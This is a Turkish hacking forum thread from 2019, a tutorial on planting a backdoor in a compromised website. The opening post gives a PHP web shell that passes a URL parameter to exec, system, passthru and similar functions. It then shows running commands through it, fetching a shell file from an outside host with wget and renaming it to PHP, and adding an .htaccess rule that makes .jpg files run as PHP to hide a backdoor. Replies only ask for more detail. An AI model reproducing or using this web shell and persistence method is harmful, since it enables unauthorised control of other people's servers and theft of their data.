Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Web & Server Güvenliği

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.


Siteye Backdoor Atma//AloneAngels

Web & Server Güvenliği

Yeni Konu aç Cevapla
 
Seçenekler
Alt 05-03-2019 21:19   #1
  • Bilgi Teknolojileri Ekibi
  • Üye Bilgileri
Üyelik tarihi
11/2015
Nereden
/etc/passwd
Yaş
18
Mesajlar
Konular

Teşekkür (Etti): 17
Teşekkür (Aldı): 63


Siteye Backdoor Atma//AloneAngels



Merhaba Dostlarım Bugün Sizlerle Siteye BackDoor Atmayı İnceleyecez Merakınız Artıysa Başlayalım Hemen
Kod:
<?php
$Aloneangels= $_GET["AloneAngels"];
if($AloneAngels){
echo exec($AloneAngels);
echo shell_exec($AloneAngels);
echo proc_open($AloneAngels);
echo system($AloneAngels);
echo popen($AloneAngels);
echo passthru($AloneAngels);
}
?>
Şimdi geldi kullanmaya arkadaşlar, erişmiş olduğumuz sitede
bir php dosyasının içine yukarıdaki kodları ekliyoruz ve şu şekilde komutlarımızı çalıştırıyoruz

Kod:
www.siteadi.com/ayar.php?ayar=ls
uname, passwd, wget, curl vs. akla gelebilecek komutları istediğimiz gibi çalıştırabiliriz.
Şimdi istersek txt olarak shell çağıralım

Kod:
www.siteadi.com/ayar.php?ayar=wget http://Aloneangels.com/denemeshell.txt
Şimdi ise çektiğimiz .txt shelli php yapalım, peki neden txt olarak çektik ?
uzaktan direkt olarak php okuyamayız arkadaşlar önce txt olarak çekicez ki
sonrasında aşağıdaki komutumuzla .txt'i .php haline getireceğiz.

Kod:
www.siteadi.com/ayar.php?ayar=mv ornekshell.txt ayar.php
Bu şekilde shellimizi ayar.php olarak aktif hale getirdik
Yalnız arkadaşlar bu fonksiyonlar disable edilmiş ise işimiz zorlaşacaktır.
o zamanda .htaccess ile .jpg uzantısını php gibi okutarak istediğimizi yapabiliriz

ve dizinde yine backdoor saklayabiliriz.

örnek olarak bir /dizin/ oluşturun içine .htaccess dosyası oluşturun ve içine şunu ekleyin.

Kod:
AddType application/x-httpd-php .jpg
Şimdi arkadaşlar resim.jpg dosyası oluşturup kaynağına shell kodları ekleyebilirsiniz
resim.jpg yi php olarak çalıştıracak
İşin özü uzaktan komut çalıştıramıyorsak
.htaccess ile yine backdoor yerleştirebiliriz. }



___________________________________________

Uykunun En Güzel Yerinde Çalan Alarm Gibiyim.
Rüzgardan Yüzüne Gelen O Lanet Fular Gibiyim.
Sinirlenip Yumrukladığın Beyaz Duvar Gibiyim.
Sana Zarar Veririm Anlayacağın Kumar Gibiyim.
 Offline  
 
Alıntı ile Cevapla
Teşekkür

Hll qnq, Battani670 Teşekkür etti.
Alt 05-03-2019 23:19   #2
  • Üsteğmen
  • Üye Bilgileri
Üyelik tarihi
12/2018
Nereden
Bilinmiyor
Mesajlar
Konular

Teşekkür (Etti): 16
Teşekkür (Aldı): 55




Dostum resim ve detay ekliyerek daha iyi bir konu haline getirebilirsin



___________________________________________

Türk olmak zordur.Dünya ile savaşırsın.
Türk olmamak daha zordur.Türk ile savaşırsın.

Software Developer & Cyber Security

 Offline  
 
Alıntı ile Cevapla
Alt 05-03-2019 23:27   #3
  • Yüzbaşı
  • Üye Bilgileri
Üyelik tarihi
12/2006
Nereden
Siber Alem
Yaş
32
Mesajlar
Konular

Teşekkür (Etti): 5
Teşekkür (Aldı): 65




hocam bunu uygulayarak anlatırmısın rica etsem



___________________________________________

Ya Devlet Başa,Ya Kuzgun Leşe
Hak Arayan Varsa Hakkını Verin, Baş Kaldıran Varsa Başını Kesin
II.Abdulhamid Han

 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau